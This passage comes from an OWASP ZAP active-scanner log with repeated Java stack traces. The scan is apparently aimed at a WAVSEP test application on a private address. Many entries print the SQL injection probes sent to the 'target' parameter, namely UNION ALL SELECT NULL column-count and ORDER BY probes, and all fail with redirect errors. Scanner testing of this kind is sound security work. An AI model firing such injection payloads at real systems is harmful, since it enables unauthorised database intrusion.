org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962933 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962934 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962937 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962938 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962943 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 8076-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 8076-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962945 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962949 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962951 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962955 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962957 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962959 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962960 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962961 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: 